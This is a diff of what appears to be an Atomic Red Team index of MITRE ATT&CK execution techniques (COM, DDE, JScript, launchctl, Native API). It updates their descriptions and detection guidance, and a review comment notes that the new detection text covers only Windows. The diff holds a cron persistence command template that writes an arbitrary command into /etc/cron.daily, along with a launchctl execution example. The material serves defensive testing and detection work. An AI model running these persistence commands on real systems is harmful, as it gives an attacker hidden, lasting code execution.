Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)
- Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [VBScript](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
+ Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
name: Component Object Model
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -38906,9 +40134,10 @@ execution:
phase_name: execution
modified: '2020-03-28T19:30:52.639Z'
created: '2020-02-12T14:09:53.107Z'
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor for COM objects loading DLLs and other modules not
typically associated with the application.(Citation: Enigma Outlook DCOM Lateral
Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012)
@@ -38917,10 +40146,9 @@ execution:
COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects,
especially those invoked by a user different than the one currently logged
on. "
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
atomic_tests: []
T1175:
technique:
@@ -39023,20 +40251,8 @@ execution:
phase_name: execution
modified: '2020-03-30T13:36:10.069Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: |-
- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
-
- Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
-
- Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_deprecated: true
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- PowerShell logs
- API monitoring
@@ -39046,8 +40262,20 @@ execution:
- Process monitoring
- Windows Registry
- Windows event logs
- x_mitre_version: '2.0'
- x_mitre_deprecated: true
+ x_mitre_detection: |-
+ Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
+
+ Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
+
+ Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1053.003:
technique:
@@ -39074,12 +40302,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -39090,11 +40317,12 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -39146,6 +40374,23 @@ execution:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1559.002:
technique:
+ created: '2020-02-12T14:10:50.699Z'
+ modified: '2020-03-28T19:32:56.572Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d
+ description: |-
+ Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
+
+ Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
+
+ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
+ name: Dynamic Data Exchange
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1559.002
@@ -39183,23 +40428,6 @@ execution:
description: NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents.
Retrieved November 21, 2017.
source_name: NVisio Labs DDE Detection Oct 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic Data Exchange
- description: |-
- Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
-
- Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
-
- Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
- id: attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T19:32:56.572Z'
- created: '2020-02-12T14:10:50.699Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -39317,16 +40545,11 @@ execution:
phase_name: execution
modified: '2020-03-28T19:06:02.690Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_system_requirements:
- - Remote exploitation for execution requires a remotely accessible service reachable
- over the network or other vector of access such as spearphishing or drive-by
- compromise.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Anti-virus
+ - System calls
+ - Process monitoring
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -39334,11 +40557,16 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- x_mitre_data_sources:
- - Anti-virus
- - System calls
- - Process monitoring
- x_mitre_version: '1.1'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_system_requirements:
+ - Remote exploitation for execution requires a remotely accessible service reachable
+ over the network or other vector of access such as spearphishing or drive-by
+ compromise.
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1061:
technique:
@@ -39365,15 +40593,14 @@ execution:
phase_name: execution
modified: '2020-03-30T13:38:08.738Z'
created: '2017-05-31T21:30:50.342Z'
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Binary file metadata
x_mitre_detection: "Detection of execution through the GUI will likely lead
to significant false positives. Other factors should be considered to detect
misuse of services that can lead to adversaries gaining access to systems
@@ -39382,25 +40609,25 @@ execution:
interactive sessions are suspicious. Collect and audit security logs that
may indicate access to and use of Legitimate Credentials to access remote
systems within the network."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
atomic_tests: []
T1559:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Inter-Process Communication
+ created: '2020-02-12T14:08:48.689Z'
+ modified: '2020-03-28T19:34:47.546Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
share data, communicate with each other, or synchronize execution. IPC is
@@ -39412,13 +40639,14 @@ execution:
or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).
Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,
may also leverage underlying IPC mechanisms."
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T19:34:47.546Z'
- created: '2020-02-12T14:08:48.689Z'
+ name: Inter-Process Communication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1559
+ url: https://attack.mitre.org/techniques/T1559
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: false
@@ -39434,6 +40662,65 @@ execution:
- DLL monitoring
- File monitoring
atomic_tests: []
+ T1059.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.007
+ url: https://attack.mitre.org/techniques/T1059/007
+ - source_name: NodeJS
+ url: https://nodejs.org/
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ - source_name: JScrip May 2018
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ - source_name: Microsoft JScript 2007
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ - source_name: Microsoft Windows Scripts
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: JavaScript/JScript
+ description: |-
+ Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
+
+ JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
+
+ Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-06-25T03:23:13.804Z'
+ created: '2020-06-23T19:12:24.924Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
+
+ Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - DLL monitoring
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ atomic_tests: []
T1569.001:
technique:
external_references:
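Review bot: The new T1059.007 entry sets `x_mitre_platforms` to Windows, macOS and Linux, but its `x_mitre_detection` text only names Windows artifacts (cscript.exe/wscript.exe, JScript.dll), so a defender reading this index gets no detection guidance for the two non-Windows platforms. The T1106 hunk further down has the same drift: macOS and Linux are added to the platforms and `System calls` to the data sources while the detection text still covers only Windows DLL loads. The wholesale key reordering across every hunk suggests this index is regenerated from upstream ATT&CK STIX data, in which case the gap should be raised upstream rather than patched by hand; if the file is hand-maintained, a YAML comment on the `x_mitre_detection` line such as `# detection guidance below is Windows-only although platforms also list macOS/Linux` would stop readers assuming cross-platform coverage. The absence of an `identifier:` key on this entry matches the other `atomic_tests: []` entries in view (T1061, T1559), so that part looks intentional.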
@@ -39456,30 +40743,30 @@ execution:
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
- Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
+ Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.
id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T18:28:34.600Z'
+ modified: '2020-06-08T23:28:29.079Z'
created: '2020-03-10T18:26:56.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - root
x_mitre_detection: KnockKnock can be used to detect persistent programs such
as those installed via launchctl as launch agents or launch daemons. Additionally,
every launch agent or launch daemon must have a corresponding plist file on
disk which can be monitored. Monitor process execution from launchctl/launchd
for unusual or unknown processes.
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1569.001
atomic_tests:
- name: Launchctl
@@ -39539,12 +40826,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -39555,11 +40841,12 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -39613,22 +40900,22 @@ execution:
phase_name: execution
modified: '2020-03-11T14:55:56.177Z'
created: '2020-03-11T14:49:36.954Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Anti-virus
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Anti-virus
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1204.002
atomic_tests:
- name: OSTap Style Macro Execution
@@ -39775,14 +41062,13 @@ execution:
name: powershell
T1204.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Malicious Link
+ created: '2020-03-11T14:43:31.706Z'
+ modified: '2020-03-11T14:43:31.706Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
them to click on a link that will lead to code execution. This user action
@@ -39791,13 +41077,14 @@ execution:
of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Links may also lead users to download files that require execution via [Malicious
File](https://attack.mitre.org/techniques/T1204/002).
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-11T14:43:31.706Z'
- created: '2020-03-11T14:43:31.706Z'
+ name: Malicious Link
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1204.001
+ url: https://attack.mitre.org/techniques/T1204/001
x_mitre_platforms:
- Linux
- macOS
@@ -39820,81 +41107,97 @@ execution:
id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Native API
- description: "Adversaries may interact with the native Windows application programming
- interface (API) to execute behaviors. Similar to the system call interface
- on UNIX systems, the Windows native API provides a controlled means to calling
- low-level OS services within the kernel, such as those involving hardware/devices,
- memory, and processes. The native API is leveraged by the OS during system
- boot (when other system components are not yet initialized) but is also exposed
- to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft
- NativeAPI)\n\nFunctionality provided by the native API is also available via
- the Windows API, which provides a documented programming interface. For example,
- functions such as the Windows API CreateProcess will allow programs
- and scripts to start other processes with proper path and argument parameters.(Citation:
- Microsoft CreateProcess) This allows API callers to execute a binary, run
- a CLI command, load modules, etc. Thousands of similar API functions exist
- for various system operations.(Citation: Microsoft Win32)\n\nOther software
- frameworks, such as Microsoft .NET, are also available to interact with the
- native API. These frameworks typically provide wrappers/abstractions to API
- functionalities and are designed for ease-of-use/portability of code.(Citation:
- Microsoft NET)\n\nAdversaries may abuse the native API as a means of execution.
- Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- the native API, and its hierarchy of interfaces, provide mechanisms to interact
- with and utilize a victimized system. "
+ description: |-
+ Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
+
+ Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
+
+ Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
+
+ Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
external_references:
- source_name: mitre-attack
external_id: T1106
url: https://attack.mitre.org/techniques/T1106
- - source_name: Microsoft NativeAPI
- url: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx
- description: Bruno, L. (2013, July 30). The Windows Native API. Retrieved
- March 15, 2020.
+ - source_name: NT API Windows
+ url: https://undocumented.ntinternals.net/
+ description: The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25,
+ 2020.
+ - source_name: Linux Kernel API
+ url: https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
+ description: Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API.
+ Retrieved June 25, 2020.
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
source_name: Microsoft CreateProcess
+ - source_name: GNU Fork
+ url: https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
+ description: Free Software Foundation, Inc.. (2020, June 18). Creating a Process.
+ Retrieved June 25, 2020.
- source_name: Microsoft Win32
url: https://docs.microsoft.com/en-us/windows/win32/api/
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
+ - source_name: LIBC
+ url: https://man7.org/linux/man-pages//man7/libc.7.html
+ description: Kerrisk, M. (2016, December 12). libc(7) — Linux manual page.
+ Retrieved June 25, 2020.
+ - source_name: GLIBC
+ url: https://www.gnu.org/software/libc/
+ description: glibc developer community. (2020, February 1). The GNU C Library
+ (glibc). Retrieved June 25, 2020.
- source_name: Microsoft NET
url: https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
description: Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15,
2020.
+ - source_name: Apple Core Services
+ url: https://developer.apple.com/documentation/coreservices
+ description: Apple. (n.d.). Core Services. Retrieved June 25, 2020.
+ - source_name: MACOS Cocoa
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1
+ description: Apple. (2015, September 16). Cocoa Application Layer. Retrieved
+ June 25, 2020.
+ - source_name: macOS Foundation
+ url: https://developer.apple.com/documentation/foundation
+ description: Apple. (n.d.). Foundation. Retrieved July 1, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-15T15:52:05.227Z'
+ modified: '2020-07-01T16:19:54.646Z'
created: '2017-05-31T21:31:17.472Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitoring API calls may generate a significant amount of
+ data and may not be useful for defense unless collected under specific circumstances,
+ since benign use of API functions are common and difficult to distinguish
+ from malicious behavior. Correlation of other events with behavior surrounding
+ API function calls using API monitoring will provide additional context to
+ an event that may assist in determining if it is due to malicious behavior.
+ Correlation of activity by process lineage by process ID may be sufficient.
+ \n\nUtilization of the Windows API may involve processes loading/accessing
+ system DLLs associated with providing called functions (ex: kernel32.dll,
+ advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially
+ to abnormal/unusual or potentially malicious processes, may indicate abuse
+ of the Windows API. Though noisy, this data can be combined with other indicators
+ to identify adversary activity. "
x_mitre_data_sources:
+ - System calls
- Loaded DLLs
- API monitoring
- Process monitoring
- x_mitre_detection: "Monitoring native and Windows API calls may generate a significant
- amount of data and may not be useful for defense unless collected under specific
- circumstances, since benign use of Windows API functions such as CreateProcess
- are common and difficult to distinguish from malicious behavior. Correlation
- of other events with behavior surrounding API function calls using API monitoring
- will provide additional context to an event that may assist in determining
- if it is due to malicious behavior. Correlation of activity by process lineage
- by process ID may be sufficient. \n\nUtilization of the Windows API may involve
- processes loading/accessing system DLLs associated with providing called functions
- (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for
- DLL loads, especially to abnormal/unusual or potentially malicious processes,
- may indicate abuse of the Windows API. Though noisy, this data can be combined
- with other indicators to identify adversary activity. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
